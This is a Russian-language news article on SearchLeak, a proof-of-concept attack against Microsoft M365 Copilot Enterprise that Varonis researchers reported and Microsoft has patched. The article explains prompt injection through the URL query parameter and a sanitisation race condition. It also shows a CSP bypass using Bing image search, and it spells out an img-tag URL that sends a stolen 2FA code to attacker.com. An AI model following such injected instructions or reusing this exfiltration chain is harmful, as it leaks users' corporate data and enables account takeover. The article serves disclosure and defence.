Недавняя демонстрационная атака (proof-of-concept) против Microsoft M365 Copilot Enterprise выявила потенциальную угрозу внедрения команд (prompt injection), которая может быть гораздо более масштабной и основана на распространенном принципе работы многих веб-сервисов с функциями ИИ.
Атака, получившая название SearchLeak, преследовала типичную злонамеренную цель: утечка конфиденциальных корпоративных данных путем обмана сотрудников, заставляя их переходить по специально созданным ссылкам.
Для осуществления атаки исследователи объединили три уязвимости в реализации поиска Copilot Enterprise, одна из которых выделяется как потенциальная проблема и для других приложений с поддержкой ИИ. Microsoft, оценившая уязвимость раскрытия информации как критическую, исправила ее на стороне сервера в начале этого месяца, однако атака также демонстрирует последствия широкого доступа сервисов на базе ИИ к корпоративным ресурсам от имени их пользователей.
«Поскольку SearchLeak нацелена на корпоративный уровень Microsoft, радиус поражения не ограничивается личными данными — она может выявить все, к чему пользователь имеет доступ внутри организации, включая электронные письма, приглашения на встречи и заметки, документы SharePoint, файлы OneDrive и другой индексируемый бизнес-контент», — заявили исследователи из Varonis Threat Labs в своем отчете. «В зависимости от того, как M365 подключен к среде, радиус поражения может быть еще шире».
Параметр в команду (Parameter-to-prompt injection)
Возможность атаки обусловлена тем, как работает Microsoft Copilot Enterprise Search.
Как это часто бывает с функциями поиска во многих веб-приложениях, Copilot Search полагается на URL-адреса, содержащие параметр ?q=[query]. Но поскольку Copilot Search основан на ИИ, параметр запроса принимает команды на естественном языке, а не только простые поисковые запросы.
«Превращение параметра URL в инструкцию ИИ, которая незаметно извлекает данные? Это и есть нативная для ИИ часть», — отметили исследователи. «Это новая поверхность атаки, которая делает классические ошибки эксплуатируемыми так, как они не были бы в противном случае, что мы теперь наблюдали с SearchLeak и Reprompt».
Reprompt — это аналогичная атака, которую исследователи Varonis обнаружили в Microsoft Copilot Personal и раскрыли на этой неделе. Но существуют и другие прецеденты того, что Varonis назвала внедрением «параметр в команду» (P2P). В октябре прошлого года исследователи из LayerX раскрыли уязвимость внедрения команд в браузере Comet от Perplexity, которая также полагалась на передачу инструкций по утечке данных в поисковую систему на базе ИИ через параметр q= в URL-адресах.
Еще раньше, в июле 2025 года, исследователи из Tenable раскрыли уязвимость в ChatGPT, которая также использовала злонамеренно сформированные URL-адреса. Поскольку параметры запросов URL становятся распространенным способом включения выполнения команд на лету в приложениях с поддержкой ИИ, этот вектор атаки может эксплуатироваться все чаще в будущем.
«Мы проверили многие другие LLM, и некоторые из них имели аналогичную технику», — сообщил CSO Марк Вайцман, руководитель группы исследований безопасности в Varonis. «Некоторые другие LLM имеют возможность использовать такой тип техники, но очень строго относятся к тому, что может быть введено».
Извлечение данных
Заставить LLM выполнить вредоносные команды для доступа к данным компании — это лишь часть успешной атаки. Другая часть требует поиска способов извлечения этих данных на внешний сервер, поскольку простое принуждение веб-сервиса отображать данные жертве в ее браузере само по себе не несет риска безопасности. Пользователь уже может искать и получать доступ к этим данным.
Одной из распространенных техник эксфильтрации при атаках внедрения команд является злоупотребление способностью веб-приложения на базе ИИ отображать ответы в виде HTML, поскольку HTML может включать элементы, требующие от браузера отправки запросов к удаленным ресурсам, например, теги <img>. Злоупотребляя такими тегами, злоумышленники могут заставить данные утекать через запросы браузера на сервер под их контролем.
В случае с Copilot Enterprise Search Microsoft внедрила защитный механизм, который заключал результаты поиска LLM в блоки <code>, представляя их браузеру в виде текста. Однако исследователи Varonis обнаружили, что это обрамление применялось только после того, как модель завершала фазу «мышления». Сам процесс мышления все еще отображался в виде HTML в браузере пользователя.
«Это классическое состояние гонки», — заявили исследователи. «Защитный механизм — это шаг постобработки, применяемый к конечному выводу, но браузер не ждет „финала“ — он отображает данные инкрементально. К тому времени, когда санитайзер активируется, ущерб уже нанесен».
У Microsoft был второй защитный механизм — Политика безопасности контента (CSP), которая позволяет владельцам веб-сайтов определять, какие внешние домены могут загружать ресурсы на страницу. В данном случае CSP для m365.cloud.microsoft.com также разрешал ресурсы с *.bing.com, поисковой системы Microsoft.
Оказалось, что Поиск изображений Bing поддерживает URL-параметр imgurl= для получения изображений с внешних серверов. В результате исследователи смогли использовать Поиск изображений Bing в качестве прокси для утечки данных.
Цепочка демонстрационной атаки, разработанная Varonis, показала, как может быть скомпрометирован код двухфакторной аутентификации пользователя, отправленный по электронной почте. Сначала они создавали ссылку на Copilot Enterprise Search, которая инструктировала сервис искать в почтовом ящике пользователя письмо с кодом, затем сохранять этот код в переменной и формировать ответ, включающий <img> с источником, равным https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/$variable/img.png.
«Поскольку Copilot Enterprise работает с полными разрешениями графа пользователя, злоумышленник фактически наследует доступ жертвы к данным организации, даже не проходя аутентификацию», — обнаружили исследователи. «Это позволяет осуществлять захват учетной записи и более широкие сценарии кражи данных без ведома жертвы. Не требуется никаких специальных привилегий со стороны злоумышленника, только сформированный URL-адрес и один клик от жертвы».
Смягчение более широких последствий
Что показывают эти POC-атаки, так это то, что разработчикам веб-приложений и сервисов на базе ИИ необходимо фильтровать типы команд, разрешенные через параметры запросов URL, и очищать вывод на этапе рендеринга, а не как шаг постобработки. Политики CSP также следует проверять на предмет потенциальных рисков подделки запросов на стороне сервера (SSRF) через домены, включенные в белый список.
Организациям, использующим такие сервисы, следует обучать сотрудников с подозрением относиться к ссылкам с длинными параметрами запросов, особенно если они закодированы. Группам безопасности следует обнаруживать и блокировать запросы к URL-адресам, содержащим теги HTML или инструкции по встраиванию данных в эти теги.
Всегда имейте в виду, что редакции могут придерживаться предвзятых взглядов в освещении новостей.
Автор – Lucian Constantin
